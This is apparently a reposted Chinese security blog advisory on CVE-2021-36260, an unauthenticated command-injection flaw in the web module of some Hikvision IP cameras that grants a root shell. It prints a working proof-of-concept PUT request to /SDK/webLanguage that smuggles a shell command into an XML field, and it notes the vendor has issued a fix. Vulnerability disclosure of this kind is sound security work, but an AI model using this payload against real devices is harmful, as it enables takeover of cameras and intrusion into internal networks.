海康威视代码执行漏洞

IoT 2年前 (2022) admin
1,473 0 0

0x00 漏洞概述

漏洞编号:CVE-2021-36260

细节:海康威视部分产品中的web模块存在一个命令注入漏洞,由于对输入参数校验不充分,攻击者利用该漏洞可以用无限制的root shell来完全控制设备,即使设备的所有者受限于有限的受保护shell(psh)。除了入侵IP摄像头外,还可以访问和攻击内部网络。该漏洞的利用并不需要用户交互,攻击者只需要访问httpHTTPS服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。

海康威视已发布版本修复该漏洞。



0x01 正文

海康威视登录页面

海康威视代码执行漏洞

漏洞PoC:

PUT /SDK/webLanguage HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: language=zhUpgrade-Insecure-Requests: 1Content-Length: 102
<?xml version='1.0'encoding='UTF-8'?> <language> $(ifconfig -a > webLib/x.asp) </language>

成功执行命令:

海康威视代码执行漏洞



– End –

原文始发于微信公众号(NS Demon团队):海康威视代码执行漏洞

版权声明:admin 发表于 2022年9月3日 上午9:45。
转载请注明:海康威视代码执行漏洞 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...